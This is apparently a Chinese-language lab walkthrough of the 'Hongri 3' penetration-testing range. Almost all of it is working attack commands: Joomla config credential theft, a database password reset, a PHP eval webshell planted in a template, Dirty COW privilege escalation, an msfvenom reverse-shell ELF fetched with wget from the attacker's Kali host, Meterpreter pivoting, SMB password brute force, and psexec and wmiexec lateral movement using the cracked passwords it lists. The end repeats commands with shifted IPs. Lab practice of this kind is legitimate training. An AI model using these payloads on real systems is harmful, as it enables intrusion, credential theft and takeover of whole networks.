红日三
黑盒测试都不知道密码
知道web-centos是192.168.0.105
kali跟web-cenos都是桥接物理网络
1.nmap -T4 -O 192.168.0.104 查看开放端口 因为不知到版本可以加上-sV 查看发现是Linux的看到开放 80,3306,22端口
2.dirsearch -u http://192.168.0.104/ --exclude-status 400,401,403,404,405,501,503
dirsearch -u http://192.168.0.104/ -e* 都可以扫描网站发现了/administrator进去查看一下,发现了joomla-cms网站
这个网站有固定漏洞configuration.php里面会有那个MySQL的账号密码
3.mysql -h 192.168.0.104 -u 账号 -p
在输入密码就可以进去
show databases;
use joomals;
show tables;
select * from am2zu_users;
update am2zu_users set password=md5("123456") where id=891;
把登录的 am2zu的password改成123456,在那个joomla-cms登入用那个找到的administrator 和123456登入
4.因为是joomla在template中可以写入木马注意格式<?php eval($_POST'a']);?>
Editing file "/error.php" in template "beez3".根据给的话去推测路径因为dirsearch 扫描/templates/ 有这个可以推测
路径http://192.168.0.104/templates/beez3/error.php
5.用蚁剑连接一下发现了命令执行不了用插件绕过,发现插件绕过只能Linux用,把蚁剑装到kali里面去,在连接一下发现可以用,点一下php7_GC_uaf php7_backtrace_uaf 发现得点两个才可以用可以成功命令执行但是是在192.168.93.120中
6.发现joomla可以ssh远程连接,刚好192.168.0.104有开放端口22ssh但是ssh需要那个账号密码,刚刚好去蚁剑找的c盘中的tmp有许多的账号密码而且是漏洞刚刚好找到账号密码
ssh wwwuser@192.168.0.104这个不行
ssh -oHostKeyAlgorithms=+ssh-dss wwwuser@192.168.0.104 加上参数可以了
7.发现权限不够用脏牛漏洞提权(可以 firefart的管理员账号然后密码自定义)
先在本地下好脏牛的脚本 在kali中开 python3 -m http.server让192.168.0.104下载
wget http://192.168.0.105:8000/dirty.c(kali的地址)
gcc -pthread dirty.c -o dirty -lcrypt
rm /tmp/passwd.bak
./dirty 123456
su firefart
123456
8.做好了以后uname -a 看看Linux的位数发现是x64的
9.
msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.0.105 lport=7777 SessionCommunicationTimeout=0 SessionExpirationTimeout=0 -f elf > shell.elf
造木马,在192.168.0.104下一下
wget http://192.168.0.105:8000/shell.elf(kali的地址)
chmod +x shell.elf
./shell.elf
执行
10. kali开启监听
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.0.105
set lport 7777
run
11. 成功执行
run post/multi/manage/autoroute(添加全部记录)
run autoroute -p
run post/multi/gather/ping_sweep rhosts=192.168.93.0/24
添加记录
12.内网信息探测
use auxiliary/scanner/discovery/udp_probe
set rhosts 192.168.93.0-255
set threads 10
run
可以用那个proxychains开代理 proxychains nmap -Pn -sT -sV 192.168.93.10 -F
还有端口扫描
发现了其他的主机端口开放跟端口
10.20.30 都是windows 100.120是Linux跟ubuntu
13
192.168.93.10 20 30 都开放了445端口
看看永恒之蓝可以不发现不行,看看能不能用smb爆破出来密码,
use auxiliary/scanner/smb/smb_login
set pass_file /root/Desktop/a.txt
set rhosts 192.168.93.10
set smbuser administrator
run可以
20 密码 123qwe!ASD
30 123qwe!ASD
10 zxcASDqw123!!
14. 用smb凭证攻击试试
use exploit/windows/smb/psexec
set payload windows/x64/meterpreter/bind_tcp
set smbuser administrator
set smbpass 123qwe!ASD
set rhosts 192.168.93.30
run
发现都可以但是有一个10 不行
用那个impacket-master/examples中的wmiexec.py 可以攻击不
proxychains python3 wmiexec.py 'administrator:zxcASDqw123!!@192.168.93.10'
可以
可以尝试扫描一下再那个windows上传fscan扫描一下内网
15 192.168.93.100 跟192.168.93.120都开放了3306MySQL(可能有弱口令漏洞)
show databases;
use joomals;
select * from am2zu_users;
update am2zu_users set password=md5("123456") where id=891;
ssh -oHostKeyAlgorithms=+ssh-dss wwwuser@192.168.0.104
wwwuser_123Aqx
ssh wwwuser@192.168.0.104
python3 -m http.server
wget http://192.168.0.104:8000/dirty.c
gcc -pthread dirty.c -o dirty -lcrypt
rm /tmp/passwd.bak
./dirty 123456
su firefart
123456
wget http://192.168.0.107:8000/shell.elf
msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.0.104 lport=7777 SessionCommunicationTimeout=0 SessionExpirationTimeout=0 -f elf > shell.elf
use auxiliary/scanner/discovery/udp_probe
set rhosts 192.168.93.0-255
set threads 10
run
proxychains nmap -Pn -sT -sV 192.168.93.10 -F
use auxiliary/scanner/smb/smb_login
set pass_file /root/Desktop/a.txt
set rhosts 192.168.93.10
set smbuser administrator
run
use exploit/windows/smb/psexec
set payload windows/x64/meterpreter/bind_tcp
set smbuser administrator
set smbpass 123qwe!ASD
set rhosts 192.168.93.30
run
80 web端口
135 rpc漏洞
445,139永恒之蓝端口 主要是445
3306 MySQL端口
3389 远程控制 端口
7001 weblogic漏洞
22 ssh端口
23 telent端口